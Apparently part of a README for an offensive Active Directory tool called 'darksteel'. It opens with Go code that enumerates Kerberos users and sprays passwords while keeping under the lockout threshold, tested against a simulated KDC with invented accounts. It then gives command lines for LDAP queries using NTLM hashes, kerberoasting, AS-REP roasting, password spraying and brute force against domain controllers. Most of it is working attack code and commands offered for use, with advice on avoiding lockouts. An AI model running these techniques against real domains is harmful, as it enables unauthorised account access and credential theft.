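type Result struct{ User, Password, Verdict string }

// Enumerate sends one AS-REQ without pre-auth per candidate name; no credentials are needed.
func Enumerate(k KDC, names []string) []Result {
	var out []Result
	for _, n := range names {
		switch k.ASReq(n, "") {
		case kdcErrPreauthRequired:
			out = append(out, Result{n, "", "exists"})
		case 0:
			out = append(out, Result{n, "", "exists, no pre-auth required (AS-REP roastable)"})
		case kdcErrClientRevoked:
			out = append(out, Result{n, "", "exists, locked or disabled"})
		}
	}
	return out
}

// Spray tries one password across all users per round and never exceeds budget attempts
// per user; set budget below lockoutThreshold and wait out the observation window between rounds.
func Spray(k KDC, users, passwords []string, budget int) []Result {
	var out []Result
	tried := map[string]int{}
	for _, p := range passwords {
		for _, u := range users {
			if tried[u] >= budget {
				continue
			}
			tried[u]++
			switch k.ASReq(u, p) {
			case 0:
				out = append(out, Result{u, p, "valid"})
				tried[u] = budget // found: stop touching this account
			case kdcErrKeyExpired:
				out = append(out, Result{u, p, "valid, password expired"})
				tried[u] = budget
			case kdcErrClientRevoked:
				out = append(out, Result{u, p, "locked out, stop spraying this user"})
				tried[u] = budget
			}
		}
	}
	return out
}

// SampleKDC holds constructed accounts; the names echo the README output, the passwords are invented.
func SampleKDC() *fakeKDC {
	return &fakeKDC{accounts: map[string]*account{
		"zz": {password: "123456"},
		"xx": {password: "Winter2023!", noPreauth: true},
		"qt": {password: "Passw0rd", expired: true},
		"ac": {password: "unused", locked: true},
	}, Attempts: map[string]int{}}
}

func main() {
	k := SampleKDC()
	for _, r := range Enumerate(k, []string{"asdfqwadad", "admin", "zz", "xx", "ac"}) {
		fmt.Printf("[+] %s: %s\n", r.User, r.Verdict)
	}
	for _, r := range Spray(k, []string{"zz", "xx", "qt", "ac"}, []string{"123456", "Passw0rd", "Summer2023"}, 2) {
		fmt.Printf("[+] %s:%s %s\n", r.User, r.Password, r.Verdict)
	}
}
```

The budget is deliberately per user rather than per round: the third password is never tried against anyone once each account has used its two attempts, which is the behaviour you want when the policy is, say, a threshold of 3 within a 30-minute window.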

Other usage

ldap

The password may be supplied as an NTLM hash
    darksteel ldap -d 192.168.1.1 -n test.com -u administrator -p hash
Query a single category with -m
    darksteel ldap -d 192.168.1.1 -n test.com -u administrator -p 123456 -m computer
Query all delegation information with -w
    darksteel ldap -d 192.168.1.1 -n test.com -u administrator -p 123456 -w all

Optional parameters

    -o  save output to a file (custom queries excluded)
    -l  maximum number of results (default: all)
    -m  query a single category
    -w  query a single delegation category

kerberos

kerberoasting (the password may be an NTLM hash)
Roast every candidate user and print the hashes
    darksteel kerberos -d 192.168.1.1 -n test.com -u administrator -p 123 -m kerberoast
Roast only the user test
    darksteel kerberos -d 192.168.1.1 -n test.com -u administrator -p 123 -m kerberoast -t test
Authenticate with a TGT (.kirbi) instead of a password; only a single target user can be roasted this way
    darksteel kerberos -d 192.168.1.1 -k 123.kirbi -m kerberoast -t test
asreproast (the password may be an NTLM hash)
Roast every candidate user and print the hashes
    darksteel kerberos -d 192.168.1.1 -n test.com -u administrator -p 123 -m asreproast
Roast only the user test (no credentials required)
    darksteel kerberos -d 192.168.1.1 -n test.com -m asreproast -t test

Optional parameters

    -o  save output to a file (custom queries excluded)
    -l  maximum number of results (default: all)
    -e  encryption type to request (default: rc4)
    -f  output format for cracking (default: hashcat)

blast

Domain user enumeration
    darksteel blast -m userenum -d 192.168.1.1 -n test.com -U user.txt
Password spraying
    darksteel blast -m passspray -d 192.168.1.1 -n test.com -U user.txt -p 123456
Single-user password brute force
    darksteel blast -m blastpass -d 192.168.1.1 -n test.com -u admin -P password.txt
User:password pair brute force (dictionary format admin:123456)
    darksteel blast -m userpass -d 192.168.1.1 -n test.com -F userpassword.txt

Optional parameters

    -v  print failures as well
    -t  thread count (default 20); note that -t is the target user under the kerberos subcommand
    -o  output file
    When blast is run from a domain-joined host the DC (-d) can be omitted; ldap queries do not support this yet

TODO

1. Keep adding exploitation techniques
2. Add more information-gathering content
3. Fix bugs

Thanks

https://github.com/jcmturner/gokrb5

https://github.com/go-ldap/ldap

https://github.com/ropnop/kerbrute